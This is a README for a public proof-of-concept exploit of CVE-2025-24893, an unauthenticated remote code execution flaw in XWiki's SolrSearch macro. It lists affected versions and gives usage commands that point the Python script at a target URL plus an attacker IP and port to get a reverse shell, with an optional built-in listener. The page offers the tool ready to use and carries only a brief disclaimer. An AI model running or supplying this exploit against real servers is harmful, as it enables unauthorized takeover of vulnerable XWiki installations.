## https://sploitus.com/exploit?id=1210D189-9921-5BD6-826E-9657A5F18ACB
# CVE-2025-24893-PoC
XWiki Unauthenticated RCE Exploit for Reverse Shell
## Affected XWiki Versions
- Versions < 15.10.11
- Versions < 16.4.1
- Versions < 16.5.0RC1
## Vulnerability Description
Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro. Unauthenticated attackers can execute arbitrary Groovy code remotely and obtain a reverse shell.
## Proof of Concept
This exploit establishes a reverse shell using the RCE vulnerability. Two modes are available: interactive or parameter-based. The exploit can automatically start a listener or use an existing one.

### Prerequisites
#### Attacker Machine
- Python 3
- The exploit script
- Netcat (if not using the automatic listener)
#### Target Machine
- Vulnerable XWiki version
- Network connectivity to attacker machine
### Usage
#### Interactive Mode
```bash
python3 xwiki_groovy_rce.py
```
#### Parameter Mode
```bash
# With automatic listener (default)
python3 xwiki_groovy_rce.py -u http://example.com -i YOUR_IP -p 4480
# With existing listener (no automatic listener)
python3 xwiki_groovy_rce.py -u http://example.com -i YOUR_IP -p 4480 --no-listener
```
#### Parameters
-h/--help: Show the help menu
-u/--url: Target XWiki URL (required)
-i/--ip: Attacker IP address for reverse shell
-p/--port: Attacker port for reverse shell
--no-listener: Skip automatic listener startup
## Reference
* https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
* https://nvd.nist.gov/vuln/detail/CVE-2025-24893
* https://www.offsec.com/blog/cve-2025-24893/
## Legal Disclaimer
This proof-of-concept is for educational and authorized testing purposes only.
Unauthorized use against systems you do not own or have explicit permission to test is illegal.
The authors are not responsible for any misuse of this information.